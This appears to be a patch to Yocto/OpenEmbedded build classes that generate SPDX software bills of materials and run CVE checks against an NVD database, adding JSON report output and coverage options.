504 if bb.data.inherits_class("native", d) or bb.data.inherits_class("cross", d):
505 recipe.annotations.append(create_annotation(d, "isNative"))
506
507 homepage = d.getVar("HOMEPAGE")
508 if homepage:
509 recipe.homepage = homepage
510
511 license = d.getVar("LICENSE")
512 if license:
513 recipe.licenseDeclared = convert_license_to_spdx(license, doc, d)
514
515 summary = d.getVar("SUMMARY")
516 if summary:
517 recipe.summary = summary
518
519 description = d.getVar("DESCRIPTION")
520 if description:
521 recipe.description = description
522
523 if d.getVar("SPDX_CUSTOM_ANNOTATION_VARS"):
524 for var in d.getVar('SPDX_CUSTOM_ANNOTATION_VARS').split():
525 recipe.annotations.append(create_annotation(d, var + "=" + d.getVar(var)))
526
527 # Some CVEs may be patched during the build process without incrementing the version number,
528 # so querying for CVEs based on the CPE id can lead to false positives. To account for this,
529 # save the CVEs fixed by patches to source information field in the SPDX.
530 patched_cves = oe.cve_check.get_patched_cves(d)
531 patched_cves = list(patched_cves)
532 patched_cves = ' '.join(patched_cves)
533 if patched_cves:
534 recipe.sourceInfo = "CVEs fixed: " + patched_cves
535
536 cpe_ids = oe.cve_check.get_cpe_ids(d.getVar("CVE_PRODUCT"), d.getVar("CVE_VERSION"))
537 if cpe_ids:
538 for cpe_id in cpe_ids:
539 cpe = oe.spdx.SPDXExternalReference()
540 cpe.referenceCategory = "SECURITY"
541 cpe.referenceType = "http://spdx.org/rdf/references/cpe23Type"
542 cpe.referenceLocator = cpe_id
543 recipe.externalRefs.append(cpe)
544
545 doc.packages.append(recipe)
546 doc.add_relationship(doc, "DESCRIBES", recipe)
547
548 add_download_packages(d, doc, recipe)
549
550 if process_sources(d) and include_sources:
551 recipe_archive = deploy_dir_spdx / "recipes" / (doc.name + ".tar.gz")
552 with optional_tarfile(recipe_archive, archive_sources) as archive:
553 spdx_get_src(d)
554
555 add_package_files(
556 d,
557 doc,
558 recipe,
559 spdx_workdir,
560 lambda file_counter: "SPDXRef-SourceFile-%s-%d" % (d.getVar("PN"), file_counter),
561 lambda filepath: ["SOURCE"],
562 ignore_dirs=[".git"],
563 ignore_top_level_dirs=["temp"],
564 archive=archive,
565 )
566
567 if archive is not None:
568 recipe.packageFileName = str(recipe_archive.name)
569
570 dep_recipes = collect_dep_recipes(d, doc, recipe)
571
572 doc_sha1 = oe.sbom.write_doc(d, doc, "recipes", indent=get_json_indent(d))
573 dep_recipes.append(oe.sbom.DepRecipe(doc, doc_sha1, recipe))
574
575 recipe_ref = oe.spdx.SPDXExternalDocumentRef()
576 recipe_ref.externalDocumentId = "DocumentRef-recipe-" + recipe.name
577 recipe_ref.spdxDocument = doc.documentNamespace
578 recipe_ref.checksum.algorithm = "SHA1"
579 recipe_ref.checksum.checksumValue = doc_sha1
580
581 sources = collect_dep_sources(d, dep_recipes)
582 found_licenses = {license.name:recipe_ref.externalDocumentId + ":" + license.licenseId for license in doc.hasExtractedLicensingInfos}
583
584 if not recipe_spdx_is_native(d, recipe):
585 bb.build.exec_func("read_subpackage_metadata", d)
586
587 pkgdest = Path(d.getVar("PKGDEST"))
588 for package in d.getVar("PACKAGES").split():
589 if not oe.packagedata.packaged(package, d):
590 continue
591
592 package_doc = oe.spdx.SPDXDocument()
593 pkg_name = d.getVar("PKG:%s" % package) or package
594 package_doc.name = pkg_name
595 package_doc.documentNamespace = get_doc_namespace(d, package_doc)
596 package_doc.creationInfo.created = creation_time
597 package_doc.creationInfo.comment = "This document was created by analyzing packages created during the build."
598 package_doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
599 package_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
600 package_doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
601 package_doc.creationInfo.creators.append("Person: N/A ()")
602 package_doc.externalDocumentRefs.append(recipe_ref)
603
604 package_license = d.getVar("LICENSE:%s" % package) or d.getVar("LICENSE")
605
606 spdx_package = oe.spdx.SPDXPackage()
607
608 spdx_package.SPDXID = oe.sbom.get_package_spdxid(pkg_name)
609 spdx_package.name = pkg_name
610 spdx_package.versionInfo = d.getVar("PV")
611 spdx_package.licenseDeclared = convert_license_to_spdx(package_license, package_doc, d, found_licenses)
612 spdx_package.supplier = d.getVar("SPDX_SUPPLIER")
613
614 package_doc.packages.append(spdx_package)
615
616 package_doc.add_relationship(spdx_package, "GENERATED_FROM", "%s:%s" % (recipe_ref.externalDocumentId, recipe.SPDXID))
617 package_doc.add_relationship(package_doc, "DESCRIBES", spdx_package)
618
619 package_archive = deploy_dir_spdx / "packages" / (package_doc.name + ".tar.gz")
620 with optional_tarfile(package_archive, archive_packaged) as archive:
621 package_files = add_package_files(
622 d,
623 package_doc,
624 spdx_package,
625 pkgdest / package,
626 lambda file_counter: oe.sbom.get_packaged_file_spdxid(pkg_name, file_counter),
627 lambda filepath: ["BINARY"],
628 ignore_top_level_dirs=['CONTROL', 'DEBIAN'],
629 archive=archive,
630 )
631
632 if archive is not None:
633 spdx_package.packageFileName = str(package_archive.name)
634
635 add_package_sources_from_debug(d, package_doc, spdx_package, package, package_files, sources)
636
637 oe.sbom.write_doc(d, package_doc, "packages", indent=get_json_indent(d))
638}
639# NOTE: depending on do_unpack is a hack that is necessary to get it's dependencies for archive the source
640addtask do_create_spdx after do_package do_packagedata do_unpack before do_populate_sdk do_build do_rm_work
641
642SSTATETASKS += "do_create_spdx"
643do_create_spdx[sstate-inputdirs] = "${SPDXDEPLOY}"
644do_create_spdx[sstate-outputdirs] = "${DEPLOY_DIR_SPDX}"
645
646python do_create_spdx_setscene () {
647 sstate_setscene(d)
648}
649addtask do_create_spdx_setscene
650
651do_create_spdx[dirs] = "${SPDXWORK}"
652do_create_spdx[cleandirs] = "${SPDXDEPLOY} ${SPDXWORK}"
653do_create_spdx[depends] += "${PATCHDEPENDENCY}"
654do_create_spdx[deptask] = "do_create_spdx"
655
656def collect_package_providers(d):
657 from pathlib import Path
658 import oe.sbom
659 import oe.spdx
660 import json
661
662 deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
663
664 providers = {}
665
666 taskdepdata = d.getVar("BB_TASKDEPDATA", False)
667 deps = sorted(set(
668 dep[0] for dep in taskdepdata.values() if dep[0] != d.getVar("PN")
669 ))
670 deps.append(d.getVar("PN"))
671
672 for dep_pn in deps:
673 recipe_data = oe.packagedata.read_pkgdata(dep_pn, d)
674
675 for pkg in recipe_data.get("PACKAGES", "").split():
676
677 pkg_data = oe.packagedata.read_subpkgdata_dict(pkg, d)
678 rprovides = set(n for n, _ in bb.utils.explode_dep_versions2(pkg_data.get("RPROVIDES", "")).items())
679 rprovides.add(pkg)
680
681 for r in rprovides:
682 providers[r] = pkg
683
684 return providers
685
686collect_package_providers[vardepsexclude] += "BB_TASKDEPDATA"
687
688python do_create_runtime_spdx() {
689 from datetime import datetime, timezone
690 import oe.sbom
691 import oe.spdx
692 import oe.packagedata
693 from pathlib import Path
694
695 deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
696 spdx_deploy = Path(d.getVar("SPDXRUNTIMEDEPLOY"))
697 is_native = bb.data.inherits_class("native", d) or bb.data.inherits_class("cross", d)
698
699 creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
700
701 providers = collect_package_providers(d)
702
703 if not is_native:
704 bb.build.exec_func("read_subpackage_metadata", d)
705
706 dep_package_cache = {}
707
708 pkgdest = Path(d.getVar("PKGDEST"))
709 for package in d.getVar("PACKAGES").split():
710 localdata = bb.data.createCopy(d)
711 pkg_name = d.getVar("PKG:%s" % package) or package
712 localdata.setVar("PKG", pkg_name)
713 localdata.setVar('OVERRIDES', d.getVar("OVERRIDES", False) + ":" + package)
714
715 if not oe.packagedata.packaged(package, localdata):
716 continue
717
718 pkg_spdx_path = deploy_dir_spdx / "packages" / (pkg_name + ".spdx.json")
719
720 package_doc, package_doc_sha1 = oe.sbom.read_doc(pkg_spdx_path)
721
722 for p in package_doc.packages:
723 if p.name == pkg_name:
724 spdx_package = p
725 break
726 else:
727 bb.fatal("Package '%s' not found in %s" % (pkg_name, pkg_spdx_path))
728
729 runtime_doc = oe.spdx.SPDXDocument()
730 runtime_doc.name = "runtime-" + pkg_name
731 runtime_doc.documentNamespace = get_doc_namespace(localdata, runtime_doc)
732 runtime_doc.creationInfo.created = creation_time
733 runtime_doc.creationInfo.comment = "This document was created by analyzing package runtime dependencies."
734 runtime_doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
735 runtime_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
736 runtime_doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
737 runtime_doc.creationInfo.creators.append("Person: N/A ()")
738
739 package_ref = oe.spdx.SPDXExternalDocumentRef()
740 package_ref.externalDocumentId = "DocumentRef-package-" + package
741 package_ref.spdxDocument = package_doc.documentNamespace
742 package_ref.checksum.algorithm = "SHA1"
743 package_ref.checksum.checksumValue = package_doc_sha1
744
745 runtime_doc.externalDocumentRefs.append(package_ref)
746
747 runtime_doc.add_relationship(
748 runtime_doc.SPDXID,
749 "AMENDS",
750 "%s:%s" % (package_ref.externalDocumentId, package_doc.SPDXID)
751 )
752
753 deps = bb.utils.explode_dep_versions2(localdata.getVar("RDEPENDS") or "")
754 seen_deps = set()
755 for dep, _ in deps.items():
756 if dep in seen_deps:
757 continue
758
759 if dep not in providers:
760 continue
761
762 dep = providers[dep]
763
764 if not oe.packagedata.packaged(dep, localdata):
765 continue
766
767 dep_pkg_data = oe.packagedata.read_subpkgdata_dict(dep, d)
768 dep_pkg = dep_pkg_data["PKG"]
769
770 if dep in dep_package_cache:
771 (dep_spdx_package, dep_package_ref) = dep_package_cache[dep]
772 else:
773 dep_path = deploy_dir_spdx / "packages" / ("%s.spdx.json" % dep_pkg)
774
775 spdx_dep_doc, spdx_dep_sha1 = oe.sbom.read_doc(dep_path)
776
777 for pkg in spdx_dep_doc.packages:
778 if pkg.name == dep_pkg:
779 dep_spdx_package = pkg
780 break
781 else:
782 bb.fatal("Package '%s' not found in %s" % (dep_pkg, dep_path))
783
784 dep_package_ref = oe.spdx.SPDXExternalDocumentRef()
785 dep_package_ref.externalDocumentId = "DocumentRef-runtime-dependency-" + spdx_dep_doc.name
786 dep_package_ref.spdxDocument = spdx_dep_doc.documentNamespace
787 dep_package_ref.checksum.algorithm = "SHA1"
788 dep_package_ref.checksum.checksumValue = spdx_dep_sha1
789
790 dep_package_cache[dep] = (dep_spdx_package, dep_package_ref)
791
792 runtime_doc.externalDocumentRefs.append(dep_package_ref)
793
794 runtime_doc.add_relationship(
795 "%s:%s" % (dep_package_ref.externalDocumentId, dep_spdx_package.SPDXID),
796 "RUNTIME_DEPENDENCY_OF",
797 "%s:%s" % (package_ref.externalDocumentId, spdx_package.SPDXID)
798 )
799 seen_deps.add(dep)
800
801 oe.sbom.write_doc(d, runtime_doc, "runtime", spdx_deploy, indent=get_json_indent(d))
802}
803
804addtask do_create_runtime_spdx after do_create_spdx before do_build do_rm_work
805SSTATETASKS += "do_create_runtime_spdx"
806do_create_runtime_spdx[sstate-inputdirs] = "${SPDXRUNTIMEDEPLOY}"
807do_create_runtime_spdx[sstate-outputdirs] = "${DEPLOY_DIR_SPDX}"
808
809python do_create_runtime_spdx_setscene () {
810 sstate_setscene(d)
811}
812addtask do_create_runtime_spdx_setscene
813
814do_create_runtime_spdx[dirs] = "${SPDXRUNTIMEDEPLOY}"
815do_create_runtime_spdx[cleandirs] = "${SPDXRUNTIMEDEPLOY}"
816do_create_runtime_spdx[rdeptask] = "do_create_spdx"
817
818def spdx_get_src(d):
819 """
820 save patched source of the recipe in SPDX_WORKDIR.
821 """
822 import shutil
823 spdx_workdir = d.getVar('SPDXWORK')
824 spdx_sysroot_native = d.getVar('STAGING_DIR_NATIVE')
825 pn = d.getVar('PN')
826
827 workdir = d.getVar("WORKDIR")
828
829 try:
830 # The kernel class functions require it to be on work-shared, so we dont change WORKDIR
831 if not is_work_shared_spdx(d):
832 # Change the WORKDIR to make do_unpack do_patch run in another dir.
833 d.setVar('WORKDIR', spdx_workdir)
834 # Restore the original path to recipe's native sysroot (it's relative to WORKDIR).
835 d.setVar('STAGING_DIR_NATIVE', spdx_sysroot_native)
836
837 # The changed 'WORKDIR' also caused 'B' changed, create dir 'B' for the
838 # possibly requiring of the following tasks (such as some recipes's
839 # do_patch required 'B' existed).
840 bb.utils.mkdirhier(d.getVar('B'))
841
842 bb.build.exec_func('do_unpack', d)
843 # Copy source of kernel to spdx_workdir
844 if is_work_shared_spdx(d):
845 share_src = d.getVar('WORKDIR')
846 d.setVar('WORKDIR', spdx_workdir)
847 d.setVar('STAGING_DIR_NATIVE', spdx_sysroot_native)
848 src_dir = spdx_workdir + "/" + d.getVar('PN')+ "-" + d.getVar('PV') + "-" + d.getVar('PR')
849 bb.utils.mkdirhier(src_dir)
850 if bb.data.inherits_class('kernel',d):
851 share_src = d.getVar('STAGING_KERNEL_DIR')
852 cmd_copy_share = "cp -rf " + share_src + "/* " + src_dir + "/"
853 cmd_copy_shared_res = os.popen(cmd_copy_share).read()
854 bb.note("cmd_copy_shared_result = " + cmd_copy_shared_res)
855
856 git_path = src_dir + "/.git"
857 if os.path.exists(git_path):
858 shutils.rmtree(git_path)
859
860 # Make sure gcc and kernel sources are patched only once
861 if not (d.getVar('SRC_URI') == "" or is_work_shared_spdx(d)):
862 bb.build.exec_func('do_patch', d)
863
864 # Some userland has no source.
865 if not os.path.exists( spdx_workdir ):
866 bb.utils.mkdirhier(spdx_workdir)
867 finally:
868 d.setVar("WORKDIR", workdir)
869
870do_rootfs[recrdeptask] += "do_create_spdx do_create_runtime_spdx"
871do_rootfs[cleandirs] += "${SPDXIMAGEWORK}"
872
873ROOTFS_POSTUNINSTALL_COMMAND =+ "image_combine_spdx ; "
874
875do_populate_sdk[recrdeptask] += "do_create_spdx do_create_runtime_spdx"
876do_populate_sdk[cleandirs] += "${SPDXSDKWORK}"
877POPULATE_SDK_POST_HOST_COMMAND:append:task-populate-sdk = " sdk_host_combine_spdx; "
878POPULATE_SDK_POST_TARGET_COMMAND:append:task-populate-sdk = " sdk_target_combine_spdx; "
879
880python image_combine_spdx() {
881 import os
882 import oe.sbom
883 from pathlib import Path
884 from oe.rootfs import image_list_installed_packages
885
886 image_name = d.getVar("IMAGE_NAME")
887 image_link_name = d.getVar("IMAGE_LINK_NAME")
888 imgdeploydir = Path(d.getVar("IMGDEPLOYDIR"))
889 img_spdxid = oe.sbom.get_image_spdxid(image_name)
890 packages = image_list_installed_packages(d)
891
892 combine_spdx(d, image_name, imgdeploydir, img_spdxid, packages, Path(d.getVar("SPDXIMAGEWORK")))
893
894 def make_image_link(target_path, suffix):
895 if image_link_name:
896 link = imgdeploydir / (image_link_name + suffix)
897 if link != target_path:
898 link.symlink_to(os.path.relpath(target_path, link.parent))
899
900 spdx_tar_path = imgdeploydir / (image_name + ".spdx.tar.gz")
901 make_image_link(spdx_tar_path, ".spdx.tar.gz")
902}
903
904python sdk_host_combine_spdx() {
905 sdk_combine_spdx(d, "host")
906}
907
908python sdk_target_combine_spdx() {
909 sdk_combine_spdx(d, "target")
910}
911
912def sdk_combine_spdx(d, sdk_type):
913 import oe.sbom
914 from pathlib import Path
915 from oe.sdk import sdk_list_installed_packages
916
917 sdk_name = d.getVar("SDK_NAME") + "-" + sdk_type
918 sdk_deploydir = Path(d.getVar("SDKDEPLOYDIR"))
919 sdk_spdxid = oe.sbom.get_sdk_spdxid(sdk_name)
920 sdk_packages = sdk_list_installed_packages(d, sdk_type == "target")
921 combine_spdx(d, sdk_name, sdk_deploydir, sdk_spdxid, sdk_packages, Path(d.getVar('SPDXSDKWORK')))
922
923def combine_spdx(d, rootfs_name, rootfs_deploydir, rootfs_spdxid, packages, spdx_workdir):
924 import os
925 import oe.spdx
926 import oe.sbom
927 import io
928 import json
929 from datetime import timezone, datetime
930 from pathlib import Path
931 import tarfile
932 import gzip
933
934 creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
935 deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
936 source_date_epoch = d.getVar("SOURCE_DATE_EPOCH")
937
938 doc = oe.spdx.SPDXDocument()
939 doc.name = rootfs_name
940 doc.documentNamespace = get_doc_namespace(d, doc)
941 doc.creationInfo.created = creation_time
942 doc.creationInfo.comment = "This document was created by analyzing the source of the Yocto recipe during the build."
943 doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
944 doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
945 doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
946 doc.creationInfo.creators.append("Person: N/A ()")
947
948 image = oe.spdx.SPDXPackage()
949 image.name = d.getVar("PN")
950 image.versionInfo = d.getVar("PV")
951 image.SPDXID = rootfs_spdxid
952 image.supplier = d.getVar("SPDX_SUPPLIER")
953
954 doc.packages.append(image)
955
956 for name in sorted(packages.keys()):
957 pkg_spdx_path = deploy_dir_spdx / "packages" / (name + ".spdx.json")
958 pkg_doc, pkg_doc_sha1 = oe.sbom.read_doc(pkg_spdx_path)
959
960 for p in pkg_doc.packages:
961 if p.name == name:
962 pkg_ref = oe.spdx.SPDXExternalDocumentRef()
963 pkg_ref.externalDocumentId = "DocumentRef-%s" % pkg_doc.name
964 pkg_ref.spdxDocument = pkg_doc.documentNamespace
965 pkg_ref.checksum.algorithm = "SHA1"
966 pkg_ref.checksum.checksumValue = pkg_doc_sha1
967
968 doc.externalDocumentRefs.append(pkg_ref)
969 doc.add_relationship(image, "CONTAINS", "%s:%s" % (pkg_ref.externalDocumentId, p.SPDXID))
970 break
971 else:
972 bb.fatal("Unable to find package with name '%s' in SPDX file %s" % (name, pkg_spdx_path))
973
974 runtime_spdx_path = deploy_dir_spdx / "runtime" / ("runtime-" + name + ".spdx.json")
975 runtime_doc, runtime_doc_sha1 = oe.sbom.read_doc(runtime_spdx_path)
976
977 runtime_ref = oe.spdx.SPDXExternalDocumentRef()
978 runtime_ref.externalDocumentId = "DocumentRef-%s" % runtime_doc.name
979 runtime_ref.spdxDocument = runtime_doc.documentNamespace
980 runtime_ref.checksum.algorithm = "SHA1"
981 runtime_ref.checksum.checksumValue = runtime_doc_sha1
982
983 # "OTHER" isn't ideal here, but I can't find a relationship that makes sense
984 doc.externalDocumentRefs.append(runtime_ref)
985 doc.add_relationship(
986 image,
987 "OTHER",
988 "%s:%s" % (runtime_ref.externalDocumentId, runtime_doc.SPDXID),
989 comment="Runtime dependencies for %s" % name
990 )
991
992 image_spdx_path = spdx_workdir / (rootfs_name + ".spdx.json")
993
994 with image_spdx_path.open("wb") as f:
995 doc.to_json(f, sort_keys=True, indent=get_json_indent(d))
996
997 num_threads = int(d.getVar("BB_NUMBER_THREADS"))
998
999 visited_docs = set()
1000
1001 index = {"documents": []}
1002
1003 spdx_tar_path = rootfs_deploydir / (rootfs_name + ".spdx.tar.gz")
1004 with gzip.open(spdx_tar_path, "w") as f:
1005 with tarfile.open(fileobj=f, mode="w|") as tar:
1006 def collect_spdx_document(path):
1007 nonlocal tar
1008 nonlocal deploy_dir_spdx
1009 nonlocal source_date_epoch
1010 nonlocal index
1011
1012 if path in visited_docs:
1013 return
1014
1015 visited_docs.add(path)
1016
1017 with path.open("rb") as f:
1018 doc, sha1 = oe.sbom.read_doc(f)
1019 f.seek(0)
1020
1021 if doc.documentNamespace in visited_docs:
1022 return
1023
1024 bb.note("Adding SPDX document %s" % path)
1025 visited_docs.add(doc.documentNamespace)
1026 info = tar.gettarinfo(fileobj=f)
1027
1028 info.name = doc.name + ".spdx.json"
1029 info.uid = 0
1030 info.gid = 0
1031 info.uname = "root"
1032 info.gname = "root"
1033
1034 if source_date_epoch is not None and info.mtime > int(source_date_epoch):
1035 info.mtime = int(source_date_epoch)
1036
1037 tar.addfile(info, f)
1038
1039 index["documents"].append({
1040 "filename": info.name,
1041 "documentNamespace": doc.documentNamespace,
1042 "sha1": sha1,
1043 })
1044
1045 for ref in doc.externalDocumentRefs:
1046 ref_path = deploy_dir_spdx / "by-namespace" / ref.spdxDocument.replace("/", "_")
1047 collect_spdx_document(ref_path)
1048
1049 collect_spdx_document(image_spdx_path)
1050
1051 index["documents"].sort(key=lambda x: x["filename"])
1052
1053 index_str = io.BytesIO(json.dumps(
1054 index,
1055 sort_keys=True,
1056 indent=get_json_indent(d),
1057 ).encode("utf-8"))
1058
1059 info = tarfile.TarInfo()
1060 info.name = "index.json"
1061 info.size = len(index_str.getvalue())
1062 info.uid = 0
1063 info.gid = 0
1064 info.uname = "root"
1065 info.gname = "root"
1066
1067 tar.addfile(info, fileobj=index_str)
diff --git a/meta/classes/create-spdx.bbclass b/meta/classes/create-spdx.bbclass
new file mode 100644
index 0000000000..19c6c0ff0b
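--- /dev/null
+++ b/meta/classes/create-spdx.bbclass
@@ -0,0 +1,8 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+# Include this class when you don't care what version of SPDX you get; it will
+# be updated to the latest stable version that is supported
+inherit create-spdx-2.2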
diff --git a/meta/classes/cve-check.bbclass b/meta/classes/cve-check.bbclass
index 8086cf05e9..5e6bae1757 100644
--- a/meta/classes/cve-check.bbclass
+++ b/meta/classes/cve-check.bbclass
@@ -20,13 +20,13 @@
20# the only method to check against CVEs. Running this tool 20# the only method to check against CVEs. Running this tool
21# doesn't guarantee your packages are free of CVEs. 21# doesn't guarantee your packages are free of CVEs.
22 22
23# The product name that the CVE database uses. Defaults to BPN, but may need to 23# The product name that the CVE database uses defaults to BPN, but may need to
24# be overriden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff). 24# be overriden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).
25CVE_PRODUCT ??= "${BPN}" 25CVE_PRODUCT ??= "${BPN}"
26CVE_VERSION ??= "${PV}" 26CVE_VERSION ??= "${PV}"
27 27
28CVE_CHECK_DB_DIR ?= "${DL_DIR}/CVE_CHECK" 28CVE_CHECK_DB_DIR ?= "${DL_DIR}/CVE_CHECK"
29CVE_CHECK_DB_FILE ?= "${CVE_CHECK_DB_DIR}/nvdcve_1.1.db" 29CVE_CHECK_DB_FILE ?= "${CVE_CHECK_DB_DIR}/nvdcve_2.db"
30CVE_CHECK_DB_FILE_LOCK ?= "${CVE_CHECK_DB_FILE}.lock" 30CVE_CHECK_DB_FILE_LOCK ?= "${CVE_CHECK_DB_FILE}.lock"
31 31
32CVE_CHECK_LOG ?= "${T}/cve.log" 32CVE_CHECK_LOG ?= "${T}/cve.log"
@@ -34,15 +34,33 @@ CVE_CHECK_TMP_FILE ?= "${TMPDIR}/cve_check"
34CVE_CHECK_SUMMARY_DIR ?= "${LOG_DIR}/cve" 34CVE_CHECK_SUMMARY_DIR ?= "${LOG_DIR}/cve"
35CVE_CHECK_SUMMARY_FILE_NAME ?= "cve-summary" 35CVE_CHECK_SUMMARY_FILE_NAME ?= "cve-summary"
36CVE_CHECK_SUMMARY_FILE ?= "${CVE_CHECK_SUMMARY_DIR}/${CVE_CHECK_SUMMARY_FILE_NAME}" 36CVE_CHECK_SUMMARY_FILE ?= "${CVE_CHECK_SUMMARY_DIR}/${CVE_CHECK_SUMMARY_FILE_NAME}"
37CVE_CHECK_SUMMARY_FILE_NAME_JSON = "cve-summary.json"
38CVE_CHECK_SUMMARY_INDEX_PATH = "${CVE_CHECK_SUMMARY_DIR}/cve-summary-index.txt"
39
40CVE_CHECK_LOG_JSON ?= "${T}/cve.json"
37 41
38CVE_CHECK_DIR ??= "${DEPLOY_DIR}/cve" 42CVE_CHECK_DIR ??= "${DEPLOY_DIR}/cve"
39CVE_CHECK_RECIPE_FILE ?= "${CVE_CHECK_DIR}/${PN}" 43CVE_CHECK_RECIPE_FILE ?= "${CVE_CHECK_DIR}/${PN}"
40CVE_CHECK_MANIFEST ?= "${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.cve" 44CVE_CHECK_RECIPE_FILE_JSON ?= "${CVE_CHECK_DIR}/${PN}_cve.json"
45CVE_CHECK_MANIFEST ?= "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.cve"
46CVE_CHECK_MANIFEST_JSON ?= "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.json"
41CVE_CHECK_COPY_FILES ??= "1" 47CVE_CHECK_COPY_FILES ??= "1"
42CVE_CHECK_CREATE_MANIFEST ??= "1" 48CVE_CHECK_CREATE_MANIFEST ??= "1"
43 49
50# Report Patched or Ignored/Whitelisted CVEs
44CVE_CHECK_REPORT_PATCHED ??= "1" 51CVE_CHECK_REPORT_PATCHED ??= "1"
45 52
53CVE_CHECK_SHOW_WARNINGS ??= "1"
54
55# Provide text output
56CVE_CHECK_FORMAT_TEXT ??= "1"
57
58# Provide JSON output - disabled by default for backward compatibility
59CVE_CHECK_FORMAT_JSON ??= "0"
60
61# Check for packages without CVEs (no issues or missing product name)
62CVE_CHECK_COVERAGE ??= "1"
63
46# Whitelist for packages (PN) 64# Whitelist for packages (PN)
47CVE_CHECK_PN_WHITELIST ?= "" 65CVE_CHECK_PN_WHITELIST ?= ""
48 66
@@ -53,12 +71,43 @@ CVE_CHECK_PN_WHITELIST ?= ""
53# 71#
54CVE_CHECK_WHITELIST ?= "" 72CVE_CHECK_WHITELIST ?= ""
55 73
56# set to "alphabetical" for version using single alphabetical character as increament release 74# Layers to be excluded
75CVE_CHECK_LAYER_EXCLUDELIST ??= ""
76
77# Layers to be included
78CVE_CHECK_LAYER_INCLUDELIST ??= ""
79
80
81# set to "alphabetical" for version using single alphabetical character as increment release
57CVE_VERSION_SUFFIX ??= "" 82CVE_VERSION_SUFFIX ??= ""
58 83
84def generate_json_report(d, out_path, link_path):
85 if os.path.exists(d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")):
86 import json
87 from oe.cve_check import cve_check_merge_jsons, update_symlinks
88
89 bb.note("Generating JSON CVE summary")
90 index_file = d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")
91 summary = {"version":"1", "package": []}
92 with open(index_file) as f:
93 filename = f.readline()
94 while filename:
95 with open(filename.rstrip()) as j:
96 data = json.load(j)
97 cve_check_merge_jsons(summary, data)
98 filename = f.readline()
99
100 summary["package"].sort(key=lambda d: d['name'])
101
102 with open(out_path, "w") as f:
103 json.dump(summary, f, indent=2)
104
105 update_symlinks(out_path, link_path)
106
59python cve_save_summary_handler () { 107python cve_save_summary_handler () {
60 import shutil 108 import shutil
61 import datetime 109 import datetime
110 from oe.cve_check import update_symlinks
62 111
63 cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE") 112 cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE")
64 113
@@ -71,13 +120,15 @@ python cve_save_summary_handler () {
71 120
72 if os.path.exists(cve_tmp_file): 121 if os.path.exists(cve_tmp_file):
73 shutil.copyfile(cve_tmp_file, cve_summary_file) 122 shutil.copyfile(cve_tmp_file, cve_summary_file)
74 123 cvefile_link = os.path.join(cvelogpath, cve_summary_name)
75 if cve_summary_file and os.path.exists(cve_summary_file): 124 update_symlinks(cve_summary_file, cvefile_link)
76 cvefile_link = os.path.join(cvelogpath, cve_summary_name) 125 bb.plain("Complete CVE report summary created at: %s" % cvefile_link)
77 126
78 if os.path.exists(os.path.realpath(cvefile_link)): 127 if d.getVar("CVE_CHECK_FORMAT_JSON") == "1":
79 os.remove(cvefile_link) 128 json_summary_link_name = os.path.join(cvelogpath, d.getVar("CVE_CHECK_SUMMARY_FILE_NAME_JSON"))
80 os.symlink(os.path.basename(cve_summary_file), cvefile_link) 129 json_summary_name = os.path.join(cvelogpath, "%s-%s.json" % (cve_summary_name, timestamp))
130 generate_json_report(d, json_summary_name, json_summary_link_name)
131 bb.plain("Complete CVE JSON report summary created at: %s" % json_summary_link_name)
81} 132}
82 133
83addhandler cve_save_summary_handler 134addhandler cve_save_summary_handler
@@ -87,23 +138,25 @@ python do_cve_check () {
87 """ 138 """
88 Check recipe for patched and unpatched CVEs 139 Check recipe for patched and unpatched CVEs
89 """ 140 """
141 from oe.cve_check import get_patched_cves
90 142
91 if os.path.exists(d.getVar("CVE_CHECK_DB_FILE")): 143 with bb.utils.fileslocked([d.getVar("CVE_CHECK_DB_FILE_LOCK")], shared=True):
92 try: 144 if os.path.exists(d.getVar("CVE_CHECK_DB_FILE")):
93 patched_cves = get_patches_cves(d) 145 try:
94 except FileNotFoundError: 146 patched_cves = get_patched_cves(d)
95 bb.fatal("Failure in searching patches") 147 except FileNotFoundError:
96 whitelisted, patched, unpatched = check_cves(d, patched_cves) 148 bb.fatal("Failure in searching patches")
97 if patched or unpatched: 149 ignored, patched, unpatched, status = check_cves(d, patched_cves)
98 cve_data = get_cve_info(d, patched + unpatched) 150 if patched or unpatched or (d.getVar("CVE_CHECK_COVERAGE") == "1" and status):
99 cve_write_data(d, patched, unpatched, whitelisted, cve_data) 151 cve_data = get_cve_info(d, patched + unpatched + ignored)
100 else: 152 cve_write_data(d, patched, unpatched, ignored, cve_data, status)
101 bb.note("No CVE database found, skipping CVE check") 153 else:
154 bb.note("No CVE database found, skipping CVE check")
102 155
103} 156}
104 157
105addtask cve_check before do_build after do_fetch 158addtask cve_check before do_build
106do_cve_check[depends] = "cve-update-db-native:do_populate_cve_db" 159do_cve_check[depends] = "cve-update-nvd2-native:do_fetch"
107do_cve_check[nostamp] = "1" 160do_cve_check[nostamp] = "1"
108 161
